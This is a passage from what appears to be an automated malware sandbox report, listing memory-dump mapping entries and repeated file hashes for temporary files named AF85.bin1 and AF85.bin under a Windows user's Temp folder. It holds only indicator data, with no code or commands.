| SHA1 | 5d6ae8b8253f1e4a3b3319169051f324f62129e9 |
| SHA256 | 7ba537a3376f393c421b1aab8065107ca4d522cb6f41eb97c2a947e84c419084 |
| SHA512 | fe167a89a9af71db0c248dc357407f270fe188a71fca0cc7bc1f4dc6b0a9554004d7d0d7f4dcacb249ba4c88365543f9641875c504697c18a1894167c757a219 |
memory/2740-211-0x0000000000000000-mapping.dmp
memory/3692-212-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 54be770385b58c1568c1ada1370d1adf |
| SHA1 | 626d03dac82cfeff0d5725b8c12349709d79b4dd |
| SHA256 | 86f85e2d93804f25e3cfee09fe1df15e1dbe8da7b0c053bb128ee78ef6d433d9 |
| SHA512 | aad53052881e5d2fb7c683ac25004acb432d3262a7a444e547b406f4d6dd3621ad5992ce5f86cdc486748cf4fa5b79b1cb7257609d1bfbe911b5c7d4373f8160 |
memory/4424-214-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 54be770385b58c1568c1ada1370d1adf |
| SHA1 | 626d03dac82cfeff0d5725b8c12349709d79b4dd |
| SHA256 | 86f85e2d93804f25e3cfee09fe1df15e1dbe8da7b0c053bb128ee78ef6d433d9 |
| SHA512 | aad53052881e5d2fb7c683ac25004acb432d3262a7a444e547b406f4d6dd3621ad5992ce5f86cdc486748cf4fa5b79b1cb7257609d1bfbe911b5c7d4373f8160 |
memory/1760-216-0x0000000000000000-mapping.dmp
memory/4988-217-0x0000000000000000-mapping.dmp
memory/1348-218-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 597039133740d0ee22dc7868a03909ef |
| SHA1 | eeb95b0895f7f4f78b0236ee31090b54f66077e5 |
| SHA256 | d48174e059afa1eb49f6b446e0e447f4040251142028172c254cdcf796757920 |
| SHA512 | 179c37cd69bbc7f2dbcb1a72d274cde53db135a84fa0c2745059e72eaad49e8d4836e27462553ff6ee986e2c2e1b984241f85dcc6eefec78426b53e544a57ffa |
memory/772-220-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 597039133740d0ee22dc7868a03909ef |
| SHA1 | eeb95b0895f7f4f78b0236ee31090b54f66077e5 |
| SHA256 | d48174e059afa1eb49f6b446e0e447f4040251142028172c254cdcf796757920 |
| SHA512 | 179c37cd69bbc7f2dbcb1a72d274cde53db135a84fa0c2745059e72eaad49e8d4836e27462553ff6ee986e2c2e1b984241f85dcc6eefec78426b53e544a57ffa |
memory/2972-222-0x0000000000000000-mapping.dmp
memory/5100-223-0x0000000000000000-mapping.dmp
memory/2932-224-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 7d825c5a4c96633508992a6c3abb24fd |
| SHA1 | ad36b8d860f800dfcc77fe928fe1f982b9ea5684 |
| SHA256 | 25651b602abc5082101a2a8457cf6ee4568ab37899bc8fe944bd05e56a7dfa35 |
| SHA512 | 5433ac8c050dd6580761e3714304c08887d77cabcc3b4518596e80c930af8f26b684b24603f5fc4a674e58203d99de343f8fffce7db0dd28528af7ed3e3f3c8a |
memory/5096-226-0x0000000000000000-mapping.dmp
memory/2608-227-0x0000000000000000-mapping.dmp
memory/2380-228-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 0e87ad773cf6131b0ed816cab2e374be |
| SHA1 | 86b594a7dda8f29bd995c872a0a8eec8bf0885b8 |
| SHA256 | 83727fd4cc7d761ab8f6eaf80cd999231283e28956e7b80a9813028b61020290 |
| SHA512 | 64a3f6a1b7335c840688b95c8c1ae5e54aa7dc71f50449cbfadc922576e7ec7cfe81a79f0108e1216f68a846150332281e36081c099201d836e8539a817a9a77 |
memory/3412-230-0x0000000000000000-mapping.dmp
memory/4524-231-0x0000000000000000-mapping.dmp
memory/4880-232-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | b52f47a8edf977a9869a9abd90c51a80 |
| SHA1 | f36072c4a247ccd83d26aa52bee75d6a24afdcf7 |
| SHA256 | 3258575092f03c4c0567f46be606f3fefb6e64dc74201cfdd74afe294bec2391 |
| SHA512 | 20b92ce3fb9cc780f99a1e122c875ee8d1f122615cdba65957e917b05254e2815bf3166a6812cd1f6e04ce7020e341a52e0b0a9dac4a5f3f067e9db80c465256 |
memory/4528-234-0x0000000000000000-mapping.dmp
memory/4500-235-0x0000000000000000-mapping.dmp
memory/4180-236-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | be8f94c21602ba05ebdea8cccd52e329 |
| SHA1 | 28adcb26e92510ac20b728698e5dabbdd18c9985 |
| SHA256 | 4d918ece6a2380537b2428bab3ae867466d6de2696679cf10ed6c6eca06d47eb |
| SHA512 | ab5464370734ea58663da38bfd30c268cbb64baae171505aa9f09bd95348a2e54716b8bb6481b2fc4ab74391808761f35afd732f67338804446e312f2edd4ef7 |
C:\Users\Admin\AppData\Local\Temp\AF85.bin
| MD5 | be8f94c21602ba05ebdea8cccd52e329 |
| SHA1 | 28adcb26e92510ac20b728698e5dabbdd18c9985 |
| SHA256 | 4d918ece6a2380537b2428bab3ae867466d6de2696679cf10ed6c6eca06d47eb |
| SHA512 | ab5464370734ea58663da38bfd30c268cbb64baae171505aa9f09bd95348a2e54716b8bb6481b2fc4ab74391808761f35afd732f67338804446e312f2edd4ef7 |